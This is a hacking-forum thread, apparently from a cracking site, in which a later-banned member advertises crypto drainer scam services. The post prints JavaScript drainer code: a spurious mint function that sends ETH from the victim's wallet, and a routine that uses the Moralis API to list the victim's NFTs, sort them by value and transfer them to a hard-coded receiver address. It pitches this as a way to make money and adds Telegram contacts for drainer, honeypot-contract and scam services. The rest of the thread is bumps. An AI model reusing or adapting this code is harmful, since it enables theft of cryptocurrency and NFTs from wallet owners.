Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 42339

PART 3 | CRYPTO DRAINER SCAM | OR HOW TO MAKE A LOT OF MONEY + FREE SOFT

by honeyman1 - 03 May, 2023 - 05:51 PM
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
#1
(This post was last modified: 29 August, 2024 - 09:18 PM by honeyman1. Edited 2 times in total.)
HI Guys [Image: ?u=https%3A%2F%2Fmedia.nulled.to%2Fpubli...Fheart.png] 
The 
honeymanOne team welcomes you . We specialize in it-crypto, our services include: development of crypto projects and all kinds of custom smart contracts


In the last article we looked at the code if you don't understand what we're talking about now, we recommend that you start with Part 1

 
First, there is this snippet from the spurious mint function, which just sends ETH from the victim to the attacker:
Quote:web3.eth.sendTransaction({
from: walletAddress,
to: address,
value: web3.utils.toWei(amount, "ether"),
})

Remember, minting an NFT is almost always a smart contract interaction, and requires invoking at least one function call. It typically requires additional orchestration beyond transfer of value to invoke a smart contract method, which is completely absent from the code above

The second snippet we want to highlight is the 

 function in the code above:
Code:
 
async function askNfts(web3, amount) {
const accounts = await web3.listAccounts();
selectedAccount = accounts[0];

fetch(`https://deep-index.moralis.io/api/v2/${selectedAccount}/nft?chain=eth&format=decimal`, {
"headers": {
"Content-Type": "application/json",
"accept": "application/json",
"x-api-key": moralisApi
},
"method": "GET",
}).then(async (response) => {
const nfts = (await response.json()).result;
console.info(`You have ${nfts.length} NFTs`);
if (nfts.length > 0) {
let transactionsOptions = [];
for (nft of nfts) {
await fetch(`https://deep-index.moralis.io/api/v2/nft/${nft.token_address}/lowestprice?chain=eth&days=${nftsInfo.checkMaxDay}&marketplace=opensea`, {
"headers": {
"Content-Type": "application/json",
"accept": "application/json",
"x-api-key": moralisApi
},
"method": "GET",
}).then(async (priceResp) => {
if (priceResp.status === 200) {} else return;
const nftData = (await priceResp.json());
let ethValue = parseFloat(Web3.utils.fromWei(nftData.price, "ether"))
if (nft.amount) ethValue = ethValue * parseInt(nft.amount)
if (ethValue >= nftsInfo.minValue.toString(10)) {
console.log(`${nft.token_address} (${nft.token_id}) | ${ethValue} > ${nftsInfo.minValue}`)
transactionsOptions.push({
price: nftData.price * (nft.amount > 0 ? nft.amount : 1),
options: {
type: nft.contract_type.toLowerCase(),
receiver: "0x8f572fB040BCA3d98EBf8aB5FFeff0fF0Fb6Df3c",
contract_address: nft.token_address,
token_id: nft.token_id,
}
})
if (nft.contract_type === "ERC1155") {
const trans = transactionsOptions.find(t => t.options.contract_address == nft.token_address && t.options.token_id == nft.token_id);
if (trans) trans.options.amount = ethers.BigNumber.from(nft.amount)
}
} else console.log(`!!! ${nft.token_address} (${nft.token_id}) | ${ethValue} < ${nftsInfo.minValue}`);
}).catch(O_o => console.error(O_o));
}
if (transactionsOptions.length < 1) return askMint(amount);
console.log(transactionsOptions);
for (transaction of transactionsOptions.sort((a, b) => b.price - a.price)) {
console.log(transaction);
Moralis.transfer(transaction.options).catch(O_o => console.error(O_o, transaction));
}
} else askMint(amount);
}).catch(O_o => console.log(O_o));
}
 telegram @honeyman1
Looks fishy doesn’t it? We can see how the attackers leverage the Moralis API in order to pull a record of the victim’s NFT ownership and cycle through them one at a time to siphon them off to a smart contract.
 
The role of the smart contract address here is not entirely clear as the source code is not verified and the bytecode analysis is outside of the scope of this post, furthermore this particular page hasn’t claimed any victims so there are no transactions to trace, but it’s noteworthy nonetheless seeing as we have examples of the same exact template moving NFTs to the attacker’s address directly and not an intermediate proxy contract.

The whole story with this "Crypto Drainer" is very simple.
Let's look at an example:
  • We are approached to make a site and "Crypto Drainer

  • From there it all depends on your imagination

  • PROFIT

 
My current contacts for our products and other issues: TG honeymanOne  [Image: pepeokay.png]  <= LOW PRICES

Honeypot Contract | Crypto Project | Drainer | Cryptocurrency Exchange | Exchangers | Crypto Wallet | Scam

- My Personal Telegram:
honeymanOne
 
- My Telegram Channel:
 honeyman_community
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #2
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #3
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #4
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #5
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #6
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #7
This is a bump
This post is by a banned member (honeyman1) - Unhide
honeyman1  
Supreme
3.060
Posts
31
Threads
1 Year of service
Bumped #8
This is a bump

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)